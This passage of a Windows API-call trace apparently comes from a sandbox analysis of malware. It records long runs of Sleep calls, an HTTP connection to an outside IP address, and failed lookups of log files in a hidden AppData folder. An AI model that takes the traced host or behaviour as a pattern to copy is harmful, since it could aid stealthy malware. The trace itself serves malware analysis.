(dwMilliseconds=0x7d0) [0223.477] Sleep (dwMilliseconds=0x7d0) [0223.478] Sleep (dwMilliseconds=0x7d0) [0223.480] Sleep (dwMilliseconds=0x7d0) [0223.481] Sleep (dwMilliseconds=0x7d0) [0223.483] Sleep (dwMilliseconds=0x7d0) [0223.484] Sleep (dwMilliseconds=0x7d0) [0223.486] Sleep (dwMilliseconds=0x7d0) [0223.487] Sleep (dwMilliseconds=0x7d0) [0223.489] Sleep (dwMilliseconds=0x7d0) [0223.490] Sleep (dwMilliseconds=0x7d0) [0223.492] Sleep (dwMilliseconds=0x7d0) [0223.496] Sleep (dwMilliseconds=0x7d0) [0223.497] Sleep (dwMilliseconds=0x7d0) [0223.499] Sleep (dwMilliseconds=0x7d0) [0223.501] Sleep (dwMilliseconds=0x7d0) [0223.502] Sleep (dwMilliseconds=0x7d0) [0223.506] Sleep (dwMilliseconds=0x7d0) [0223.508] Sleep (dwMilliseconds=0x7d0) [0223.509] Sleep (dwMilliseconds=0x7d0) [0223.511] Sleep (dwMilliseconds=0x7d0) [0223.512] Sleep (dwMilliseconds=0x7d0) [0223.514] Sleep (dwMilliseconds=0x7d0) [0223.517] Sleep (dwMilliseconds=0x7d0) [0223.519] Sleep (dwMilliseconds=0x7d0) [0223.520] Sleep (dwMilliseconds=0x7d0) [0223.522] Sleep (dwMilliseconds=0x7d0) [0223.523] Sleep (dwMilliseconds=0x7d0) [0223.525] Sleep (dwMilliseconds=0x7d0) [0223.526] Sleep (dwMilliseconds=0x7d0) [0223.528] Sleep (dwMilliseconds=0x7d0) [0223.529] Sleep (dwMilliseconds=0x7d0) [0223.531] Sleep (dwMilliseconds=0x7d0) [0223.533] Sleep (dwMilliseconds=0x7d0) [0223.535] Sleep (dwMilliseconds=0x7d0) [0223.536] Sleep (dwMilliseconds=0x7d0) [0223.539] Sleep (dwMilliseconds=0x7d0) [0223.541] Sleep (dwMilliseconds=0x7d0) [0223.542] Sleep (dwMilliseconds=0x7d0) [0223.544] Sleep (dwMilliseconds=0x7d0) [0223.545] Sleep (dwMilliseconds=0x7d0) [0223.547] Sleep (dwMilliseconds=0x7d0) [0223.548] Sleep (dwMilliseconds=0x7d0) [0223.550] Sleep (dwMilliseconds=0x7d0) [0223.551] Sleep (dwMilliseconds=0x7d0) [0223.553] Sleep (dwMilliseconds=0x7d0) [0223.554] Sleep (dwMilliseconds=0x7d0) [0223.556] Sleep (dwMilliseconds=0x7d0) [0223.557] Sleep (dwMilliseconds=0x7d0) [0223.559] Sleep (dwMilliseconds=0x7d0) [0223.560] Sleep (dwMilliseconds=0x7d0) [0223.562] Sleep (dwMilliseconds=0x7d0) [0223.567] Sleep (dwMilliseconds=0x7d0) [0223.569] Sleep (dwMilliseconds=0x7d0) [0223.570] Sleep (dwMilliseconds=0x7d0) [0223.572] Sleep (dwMilliseconds=0x7d0) [0223.573] Sleep (dwMilliseconds=0x7d0) [0223.575] Sleep (dwMilliseconds=0x7d0) [0223.576] Sleep (dwMilliseconds=0x7d0) [0223.578] Sleep (dwMilliseconds=0x7d0) [0223.579] Sleep (dwMilliseconds=0x7d0) [0223.581] Sleep (dwMilliseconds=0x7d0) [0223.582] Sleep (dwMilliseconds=0x7d0) [0223.584] Sleep (dwMilliseconds=0x7d0) [0223.585] Sleep (dwMilliseconds=0x7d0) [0223.587] Sleep (dwMilliseconds=0x7d0) [0223.588] Sleep (dwMilliseconds=0x7d0) [0223.590] Sleep (dwMilliseconds=0x7d0) [0223.591] Sleep (dwMilliseconds=0x7d0) [0223.593] Sleep (dwMilliseconds=0x7d0) [0223.597] Sleep (dwMilliseconds=0x7d0) [0223.599] Sleep (dwMilliseconds=0x7d0) [0223.600] Sleep (dwMilliseconds=0x7d0) [0223.602] Sleep (dwMilliseconds=0x7d0) [0223.603] Sleep (dwMilliseconds=0x7d0) [0223.605] Sleep (dwMilliseconds=0x7d0) [0223.606] Sleep (dwMilliseconds=0x7d0) [0223.608] Sleep (dwMilliseconds=0x7d0) [0223.609] Sleep (dwMilliseconds=0x7d0) [0223.611] Sleep (dwMilliseconds=0x7d0) [0223.612] Sleep (dwMilliseconds=0x7d0) [0223.614] Sleep (dwMilliseconds=0x7d0) [0223.615] Sleep (dwMilliseconds=0x7d0) [0223.617] Sleep (dwMilliseconds=0x7d0) [0223.618] Sleep (dwMilliseconds=0x7d0) [0223.620] Sleep (dwMilliseconds=0x7d0) [0223.621] Sleep (dwMilliseconds=0x7d0) [0223.623] Sleep (dwMilliseconds=0x7d0) [0223.624] Sleep (dwMilliseconds=0x7d0) [0223.626] Sleep (dwMilliseconds=0x7d0) [0223.628] Sleep (dwMilliseconds=0x7d0) [0223.629] Sleep (dwMilliseconds=0x7d0) [0223.631] Sleep (dwMilliseconds=0x7d0) [0223.632] Sleep (dwMilliseconds=0x7d0) [0223.634] Sleep (dwMilliseconds=0x7d0) [0223.636] Sleep (dwMilliseconds=0x7d0) [0223.638] Sleep (dwMilliseconds=0x7d0) [0223.639] Sleep (dwMilliseconds=0x7d0) [0223.641] Sleep (dwMilliseconds=0x7d0) [0223.642] Sleep (dwMilliseconds=0x7d0) [0223.644] Sleep (dwMilliseconds=0x7d0) [0223.646] Sleep (dwMilliseconds=0x7d0) [0223.647] Sleep (dwMilliseconds=0x7d0) [0223.649] Sleep (dwMilliseconds=0x7d0) [0223.650] Sleep (dwMilliseconds=0x7d0) [0223.652] Sleep (dwMilliseconds=0x7d0) [0223.653] Sleep (dwMilliseconds=0x7d0) [0223.655] Sleep (dwMilliseconds=0x7d0) [0223.656] Sleep (dwMilliseconds=0x7d0) [0223.658] Sleep (dwMilliseconds=0x7d0) [0223.660] Sleep (dwMilliseconds=0x7d0) [0223.661] Sleep (dwMilliseconds=0x7d0) [0223.663] Sleep (dwMilliseconds=0x7d0) [0223.664] Sleep (dwMilliseconds=0x7d0) [0223.666] Sleep (dwMilliseconds=0x7d0) [0223.667] Sleep (dwMilliseconds=0x7d0) [0223.669] Sleep (dwMilliseconds=0x7d0) [0223.670] Sleep (dwMilliseconds=0x7d0) [0223.672] Sleep (dwMilliseconds=0x7d0) [0223.673] Sleep (dwMilliseconds=0x7d0) [0223.675] Sleep (dwMilliseconds=0x7d0) [0223.676] Sleep (dwMilliseconds=0x7d0) [0223.678] Sleep (dwMilliseconds=0x7d0) [0223.679] Sleep (dwMilliseconds=0x7d0) [0223.681] Sleep (dwMilliseconds=0x7d0) [0223.682] Sleep (dwMilliseconds=0x7d0) [0223.684] Sleep (dwMilliseconds=0x7d0) [0223.685] Sleep (dwMilliseconds=0x7d0) [0223.687] Sleep (dwMilliseconds=0x7d0) [0223.688] Sleep (dwMilliseconds=0x7d0) [0223.690] Sleep (dwMilliseconds=0x7d0) [0223.691] Sleep (dwMilliseconds=0x7d0) [0223.693] Sleep (dwMilliseconds=0x7d0) [0223.694] Sleep (dwMilliseconds=0x7d0) [0223.696] Sleep (dwMilliseconds=0x7d0) [0223.699] Sleep (dwMilliseconds=0x7d0) [0223.700] Sleep (dwMilliseconds=0x7d0) [0223.702] Sleep (dwMilliseconds=0x7d0) [0223.703] Sleep (dwMilliseconds=0x7d0) [0223.705] Sleep (dwMilliseconds=0x7d0) [0223.706] Sleep (dwMilliseconds=0x7d0) [0223.708] Sleep (dwMilliseconds=0x7d0) [0223.709] Sleep (dwMilliseconds=0x7d0) [0223.713] Sleep (dwMilliseconds=0x7d0) [0223.715] socket (af=2, type=1, protocol=6) returned 0x1e98 [0223.715] connect (s=0x1e98, name=0x9f92b30*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0223.735] send (s=0x1e98, buf=0x82e10fa*, len=173, flags=0) returned 173 [0223.735] setsockopt (s=0x1e98, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0223.735] recv (in: s=0x1e98, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 477 [0223.911] closesocket (s=0x1e98) returned 0 [0223.911] Sleep (dwMilliseconds=0x7d0) [0223.913] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.913] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.913] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0223.913] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.913] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.913] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.914] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.914] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.914] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.914] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.914] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.914] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.914] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.914] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.914] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.914] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7500) returned 1 [0223.914] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.914] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.914] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.914] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.914] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.914] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.914] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.914] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f77d0) returned 1 [0223.914] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.914] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.915] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.915] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.915] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.915] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.915] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.915] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.915] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.915] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.915] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.915] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.915] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.915] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.915] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0223.915] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.915] Sleep (dwMilliseconds=0x7d0) [0223.920] Sleep (dwMilliseconds=0x7d0) [0223.921] Sleep (dwMilliseconds=0x7d0) [0223.924] Sleep (dwMilliseconds=0x7d0) [0223.926] Sleep (dwMilliseconds=0x7d0) [0223.927] Sleep (dwMilliseconds=0x7d0) [0223.929] Sleep (dwMilliseconds=0x7d0) [0223.931] Sleep (dwMilliseconds=0x7d0) [0223.932] Sleep (dwMilliseconds=0x7d0) [0223.935] Sleep (dwMilliseconds=0x7d0) [0223.937] Sleep (dwMilliseconds=0x7d0) [0223.938] Sleep (dwMilliseconds=0x7d0) [0223.939] Sleep (dwMilliseconds=0x7d0) [0223.941] Sleep (dwMilliseconds=0x7d0) [0223.942] Sleep (dwMilliseconds=0x7d0) [0223.945] Sleep (dwMilliseconds=0x7d0) [0223.947] Sleep (dwMilliseconds=0x7d0) [0223.949] Sleep (dwMilliseconds=0x7d0) [0223.950] Sleep (dwMilliseconds=0x7d0) [0223.952] Sleep (dwMilliseconds=0x7d0) [0223.953] Sleep (dwMilliseconds=0x7d0) [0223.955] Sleep (dwMilliseconds=0x7d0) [0223.956] Sleep (dwMilliseconds=0x7d0) [0223.958] Sleep (dwMilliseconds=0x7d0) [0223.959] Sleep (dwMilliseconds=0x7d0) [0223.961] Sleep (dwMilliseconds=0x7d0) [0223.962] Sleep (dwMilliseconds=0x7d0) [0223.964] Sleep (dwMilliseconds=0x7d0) [0223.965] Sleep (dwMilliseconds=0x7d0) [0223.968] Sleep (dwMilliseconds=0x7d0) [0223.970] Sleep (dwMilliseconds=0x7d0) [0223.972] Sleep (dwMilliseconds=0x7d0) [0223.973] Sleep (dwMilliseconds=0x7d0) [0223.975] Sleep (dwMilliseconds=0x7d0) [0223.976] Sleep (dwMilliseconds=0x7d0) [0223.979] Sleep (dwMilliseconds=0x7d0) [0223.981] Sleep (dwMilliseconds=0x7d0) [0223.982] Sleep (dwMilliseconds=0x7d0) [0223.984] Sleep (dwMilliseconds=0x7d0) [0223.985] Sleep (dwMilliseconds=0x7d0) [0223.987] Sleep (dwMilliseconds=0x7d0) [0223.988] Sleep (dwMilliseconds=0x7d0) [0223.990] Sleep (dwMilliseconds=0x7d0) [0223.992] Sleep (dwMilliseconds=0x7d0) [0223.993] Sleep (dwMilliseconds=0x7d0) [0223.995] Sleep (dwMilliseconds=0x7d0) [0223.996] Sleep (dwMilliseconds=0x7d0) [0223.998] Sleep (dwMilliseconds=0x7d0) [0223.999] Sleep (dwMilliseconds=0x7d0) [0224.001] Sleep (dwMilliseconds=0x7d0) [0224.002] Sleep (dwMilliseconds=0x7d0) [0224.004] Sleep (dwMilliseconds=0x7d0) [0224.005] Sleep (dwMilliseconds=0x7d0) [0224.007] Sleep (dwMilliseconds=0x7d0) [0224.008] Sleep (dwMilliseconds=0x7d0) [0224.012] Sleep (dwMilliseconds=0x7d0) [0224.015] Sleep (dwMilliseconds=0x7d0) [0224.050] Sleep (dwMilliseconds=0x7d0) [0224.052] Sleep (dwMilliseconds=0x7d0) [0224.053] Sleep (dwMilliseconds=0x7d0) [0224.055] Sleep (dwMilliseconds=0x7d0) [0224.059] Sleep (dwMilliseconds=0x7d0) [0224.061] Sleep (dwMilliseconds=0x7d0) [0224.062] Sleep (dwMilliseconds=0x7d0) [0224.064] Sleep (dwMilliseconds=0x7d0) [0224.067] Sleep (dwMilliseconds=0x7d0) [0224.070] Sleep (dwMilliseconds=0x7d0) [0224.072] Sleep (dwMilliseconds=0x7d0) [0224.074] Sleep (dwMilliseconds=0x7d0) [0224.075] Sleep (dwMilliseconds=0x7d0) [0224.078] Sleep (dwMilliseconds=0x7d0) [0224.081] Sleep (dwMilliseconds=0x7d0) [0224.082] Sleep (dwMilliseconds=0x7d0) [0224.084] Sleep (dwMilliseconds=0x7d0) [0224.085] Sleep (dwMilliseconds=0x7d0) [0224.087] Sleep (dwMilliseconds=0x7d0) [0224.088] Sleep (dwMilliseconds=0x7d0) [0224.090] Sleep (dwMilliseconds=0x7d0) [0224.091] Sleep (dwMilliseconds=0x7d0) [0224.093] Sleep (dwMilliseconds=0x7d0) [0224.094] Sleep (dwMilliseconds=0x7d0) [0224.096] Sleep (dwMilliseconds=0x7d0) [0224.097] Sleep (dwMilliseconds=0x7d0) [0224.100] Sleep (dwMilliseconds=0x7d0) [0224.103] Sleep (dwMilliseconds=0x7d0) [0224.104] Sleep (dwMilliseconds=0x7d0) [0224.106] Sleep (dwMilliseconds=0x7d0) [0224.107] Sleep (dwMilliseconds=0x7d0) [0224.109] Sleep (dwMilliseconds=0x7d0) [0224.114] Sleep (dwMilliseconds=0x7d0) [0224.117] Sleep (dwMilliseconds=0x7d0) [0224.119] Sleep (dwMilliseconds=0x7d0) [0224.120] Sleep (dwMilliseconds=0x7d0) [0224.122] Sleep (dwMilliseconds=0x7d0) [0224.124] Sleep (dwMilliseconds=0x7d0) [0224.125] Sleep (dwMilliseconds=0x7d0) [0224.127] Sleep (dwMilliseconds=0x7d0) [0224.128] Sleep (dwMilliseconds=0x7d0) [0224.130] Sleep (dwMilliseconds=0x7d0) [0224.133] Sleep 